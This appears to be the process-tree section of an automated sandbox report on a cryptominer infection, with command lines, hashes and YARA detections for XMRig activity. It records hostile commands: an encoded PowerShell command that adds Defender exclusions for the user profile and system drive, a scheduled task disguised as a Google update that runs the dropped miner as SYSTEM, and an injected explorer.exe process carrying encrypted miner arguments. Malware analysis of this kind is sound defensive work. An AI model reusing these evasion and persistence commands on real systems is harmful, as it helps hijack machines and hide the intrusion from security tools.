                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A
                                                                              Imagebase:0x7ff602050000
                                                                              File size:273920 bytes
                                                                              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Target ID:11
                                                                              Start time:21:09:15
                                                                              Start date:26/04/2022
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff77f440000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Target ID:12
                                                                              Start time:21:09:16
                                                                              Start date:26/04/2022
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A"
                                                                              Imagebase:0x7ff619710000
                                                                              File size:447488 bytes
                                                                              MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Reputation:high

                                                                              Target ID:14
                                                                              Start time:21:09:22
                                                                              Start date:26/04/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                              Imagebase:0x7ff78ca80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Target ID:15
                                                                              Start time:21:09:23
                                                                              Start date:26/04/2022
                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 7076 -s 1908
                                                                              Imagebase:0x7ff76a840000
                                                                              File size:494488 bytes
                                                                              MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Target ID:18
                                                                              Start time:21:09:32
                                                                              Start date:26/04/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                              Imagebase:0x7ff78ca80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Target ID:19
                                                                              Start time:21:09:35
                                                                              Start date:26/04/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                              Imagebase:0x7ff78ca80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Target ID:20
                                                                              Start time:21:09:36
                                                                              Start date:26/04/2022
                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 6436 -s 1072
                                                                              Imagebase:0x7ff76a840000
                                                                              File size:494488 bytes
                                                                              MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET

                                                                              Target ID:21
                                                                              Start time:21:09:44
                                                                              Start date:26/04/2022
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\user\AppData\Roaming\Windows\services86.exe
                                                                              Imagebase:0x7ff602050000
                                                                              File size:273920 bytes
                                                                              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:22
                                                                              Start time:21:09:44
                                                                              Start date:26/04/2022
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff77f440000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:23
                                                                              Start time:21:09:45
                                                                              Start date:26/04/2022
                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\user\AppData\Roaming\Windows\services86.exe"
                                                                              Imagebase:0x7ff6f84c0000
                                                                              File size:226816 bytes
                                                                              MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:27
                                                                              Start time:21:09:52
                                                                              Start date:26/04/2022
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\cmd.exe" cmd /c "C:\Users\user\AppData\Roaming\Windows\services86.exe
                                                                              Imagebase:0x7ff602050000
                                                                              File size:273920 bytes
                                                                              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:28
                                                                              Start time:21:09:53
                                                                              Start date:26/04/2022
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff77f440000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:29
                                                                              Start time:21:09:53
                                                                              Start date:26/04/2022
                                                                              Path:C:\Users\user\AppData\Roaming\Windows\services86.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Users\user\AppData\Roaming\Windows\services86.exe
                                                                              Imagebase:0xed0000
                                                                              File size:4442624 bytes
                                                                              MD5 hash:108368196293017A706ADE912F519495
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.661445568.000000001E2C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML

                                                                              Target ID:30
                                                                              Start time:21:10:05
                                                                              Start date:26/04/2022
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A
                                                                              Imagebase:0x7ff602050000
                                                                              File size:273920 bytes
                                                                              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:31
                                                                              Start time:21:10:06
                                                                              Start date:26/04/2022
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff77f440000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:32
                                                                              Start time:21:10:09
                                                                              Start date:26/04/2022
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A"
                                                                              Imagebase:0x7ff619710000
                                                                              File size:447488 bytes
                                                                              MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET

                                                                              Target ID:34
                                                                              Start time:21:10:15
                                                                              Start date:26/04/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                              Imagebase:0x7ff78ca80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:36
                                                                              Start time:21:10:35
                                                                              Start date:26/04/2022
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\conhost.exe
                                                                              Imagebase:0x7ff77f440000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:37
                                                                              Start time:21:10:35
                                                                              Start date:26/04/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                              Imagebase:0x7ff78ca80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:39
                                                                              Start time:21:10:38
                                                                              Start date:26/04/2022
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\conhost.exe" "pbsidfqjdbrp
                                                                              Imagebase:0x7ff77f440000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET

                                                                              Target ID:40
                                                                              Start time:21:10:40
                                                                              Start date:26/04/2022
                                                                              Path:C:\Windows\explorer.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\explorer.exe zaxwujrpzpz0 NV/UX0XBuNRBWS1fF1Br++rCWld6jYh8EV4bO5NNvAb/5HIZwMhaD5NHJK5z9yNMjMMytH6YY4V55yfqWTQcp12cDSmlF6KKjp+Efu9KvL4SaXUjJ1+pbf+qj6k80A11p9RBq/ea7q4JQbAof6DO9w2NSwY2P/eQdDvkJvlXTHwvNMDMUjwmGA6FU/A9poINN+IS9cW53yukVYFD6Su/c8CqGYS4ifglLSM0j7mQykFqVEF0CjxSELaijRRGUV4pKZhHpb12LA0Vdcl7ekwOnt/zMSPiSwVay5rEBRJnuUFPIIktvItGKBK4ACGTOTqoPi0Hwp99GwYdY6hvlhzROvSxGFr63zNaVIZV1HL7mUPX5ICuxBxUgAURBxJcPcCDFtB6+YHcgebLsBjBHY6e778xlKAi+KMQhPPHAt2IhKnBuQNhYbkw20Qh4OsKyGjRuikRJY8g3TEE/RpYBkU2gM2pude0dusb3bcc6h3jJ8mqx1aqIvyYff4zch7WANZWOTWRwEz/LV6jXQrqAfeuV/LYITPX+2lLumdpKzFrcng=
                                                                              Imagebase:
                                                                              File size:3933184 bytes
                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000028.00000002.701324067.0000000000AD5000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000028.00000002.700493754.0000000000A68000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000028.00000002.701207386.0000000000AC2000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000028.00000002.701030193.0000000000AB4000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                              • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000028.00000000.675395172.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000028.00000000.675395172.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 00000028.00000000.675395172.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000028.00000000.685704029.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000028.00000000.685704029.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 00000028.00000000.685704029.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000028.00000000.678879593.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000028.00000000.678879593.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 00000028.00000000.678879593.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000028.00000002.702906688.0000000002E6A000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000028.00000000.681018701.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000028.00000000.681018701.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 00000028.00000000.681018701.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000028.00000000.695452569.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000028.00000000.695452569.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 00000028.00000000.695452569.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000028.00000000.697578761.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000028.00000000.697578761.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 00000028.00000000.697578761.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000028.00000000.692061065.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000028.00000000.692061065.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 00000028.00000000.692061065.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000028.00000000.688605415.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000028.00000000.688605415.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 00000028.00000000.688605415.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen

                                                                              No disassembly